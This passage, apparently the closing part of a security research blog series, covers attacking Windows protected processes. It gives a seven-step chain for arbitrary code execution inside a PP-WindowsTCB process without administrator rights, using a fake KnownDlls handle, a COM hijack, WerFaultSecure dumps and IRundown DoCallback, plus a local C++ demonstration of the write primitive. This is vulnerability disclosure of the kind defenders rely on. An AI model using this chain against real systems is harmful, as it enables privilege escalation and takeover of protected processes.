The final piece of the puzzle is finding an exported function which we can call to write an arbitrary value into the global variable. This turns out to be harder than expected. The ideal function would be one which takes a single pointer-valued argument and writes to that location with no other side effects. After a number of false starts (including trying to use gets) I settled on the pair SetProcessDefaultLayout and GetProcessDefaultLayout in USER32. The set function takes a single value, which is a set of flags, and stores it in a global location (actually in the kernel, but good enough). The get function will then write that value to an arbitrary pointer. This isn't perfect, as the values we can set, and therefore write, are limited to the numbers 0-7; however, by offsetting the pointer in the get calls we can write a value of the form 0x0?0?0?0? where each ? can be any value between 0 and 7. As the value just has to refer to a handle inside a process under our control, we can easily craft the handle to meet these strict requirements (a local demonstration of the write pattern appears after the list of steps below).

Wrapping Up

In conclusion, to get arbitrary code execution inside a PP-WindowsTCB process without administrator privileges we can do the following:
  1. Create a fake KnownDlls directory, duplicating the handle until it meets a pattern suitable for writing through Get/SetProcessDefaultLayout. Mark the handle as inheritable.
  2. Create the COM object hijack for CLSID {07FC2B94-5285-417E-8AC3-C2CE5240B0FA} with the ThreadingModel set to “Free”.
  3. Start the Windows 10 WerFaultSecure at PP-WindowsTCB level and request a crash dump of an AppContainer process. During process creation the fake KnownDlls directory handle must be added to ensure it's inherited into the new process.
  4. Wait until COM has initialized then use Windows 8.1 WerFaultSecure to dump the process memory of the target.
  5. Parse the crash dump to discover the process secret, context pointer and IPID for IRundown.
  6. Connect to the IRundown interface and use DoCallback with Get/SetProcessDefaultLayout to modify the LdrpKnownDllDirectoryHandle global variable to the handle value created in 1.
  7. Call DoCallback again to call LoadLibrary with a name to load from our fake KnownDlls.
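To make step 6's write primitive concrete, here's a small, single-process demonstration of how the Get/SetProcessDefaultLayout pair builds a value of the form 0x0?0?0?0? one byte at a time. In the real attack each of these calls would be made inside the target via DoCallback; here they're run locally against a stack buffer purely to show the write pattern, and the specific target value is arbitrary.

// Local demonstration of the 0x0?0?0?0? write pattern using the USER32 pair.
// Each "set" stores a small flag value, each "get" writes that value out as a
// 32-bit DWORD to an arbitrary address; writing at offsets 0..3 in turn leaves
// one low nibble per byte behind.
#include <windows.h>
#include <stdio.h>

int main() {
  unsigned char buffer[8] = {};
  const unsigned char nibbles[4] = { 4, 0, 2, 0 };  // Builds the value 0x00020004.

  for (int offset = 0; offset < 4; offset++) {
    // Store the flag value (limited to small numbers) in the global location...
    SetProcessDefaultLayout(nibbles[offset]);
    // ...then have it written out at buffer + offset. Each write zeroes the
    // three bytes above the one we care about, which is why we go low to high.
    GetProcessDefaultLayout(reinterpret_cast<DWORD*>(buffer + offset));
  }

  printf("Constructed value: 0x%08lx\n", *reinterpret_cast<DWORD*>(buffer));
  return 0;
}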

This process works on all supported versions of Windows 10 including 1809. It’s worth noting that invoking DoCallback can be used with any process where you can read the contents of memory and the process has initialized COM remoting. For example, if you had an arbitrary memory disclosure vulnerability in a privileged COM service you could use this attack to convert the arbitrary read into arbitrary execute. As I don’t tend to look for memory corruption/memory disclosure vulnerabilities perhaps this behavior is of more use to others.
That concludes my series on attacking Windows protected processes. I think it demonstrates that preventing a user from attacking processes which share resources, such as the registry and files, is ultimately doomed to fail. This is probably why Microsoft do not support PP/PPL as a security boundary. Isolated User Mode seems a much stronger primitive, although that does come with additional resource requirements which PP/PPL, for the most part, doesn't. I wouldn't be surprised if newer versions of Windows 10, by which I mean after version 1809, try to mitigate these attacks in some way, but you'll almost certainly be able to find a bypass.